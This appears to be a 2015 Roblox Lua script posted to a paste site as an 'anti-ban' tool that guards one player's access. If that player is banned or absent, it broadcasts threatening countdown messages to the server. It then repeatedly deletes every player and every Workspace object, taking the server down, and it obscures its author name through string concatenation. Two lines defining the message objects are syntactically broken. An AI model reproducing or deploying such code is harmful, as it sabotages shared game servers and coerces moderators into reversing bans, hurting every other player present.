

Feb 28th, 2015
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  1. -----Derek1017's Anti-Ban Script!--------------------------------------Don't Take Credit!------------------------------------
  2. ------------Don't change this!-----------
  3. n = "B"
  4. n = n.."a"
  5. n = n.."ns"
  6. n = n.."e"
  7. n = n.."y"
  8. h ="Hint")
  9. m ="Message")
  10. script.Name = n.."'s antiban"
  11. --------------You can change below------------------
  12. respawntime = .1
  13. protect = "Derek1017"
  14. -------Version [Don't change]------------
  15. version = 1.05
  17. while true do
  18. if game.Players:findFirstChild(protect) == nil then
  19. m.Parent = game.Workspace
  20. m.Text = protect.." is banned, the server will be removed..."
  21. wait(3)
  22. m.Text = "Unban "..protect.." or remove your script, else the server will be down with the following countdown!"
  23. wait(3)
  24. for i= respawntime, 0, -1 do
  25. if game.Players:findFirstChild(protect) == nil then
  26. m.Text = "If "..protect.." doesn't reappear in ["..i.."] then the server is down!"
  27. wait(1)
  28. end
  29. end
  30. if game.Players:findFirstChild(protect) ~= nil then
  31. m.Text = protect.." came back, nothing will happen!"
  32. wait(3)
  33. m:remove()
  34. else
  35. while true do
  36. for i, p in ipairs(game.Players:getChildren()) do
  37. p:Remove()
  38. end
  39. for i, w in ipairs(game.Workspace:getChildren()) do
  40. w:Remove()
  41. end
  42. wait()
  43. end
  44. end
  45. else
  46. h.Parent = game.Workspace
  47. h.Text = "Protecting: "..protect.." - Version: "..version.." - Created By: "..n
  48. end
  49. wait()
  50. end
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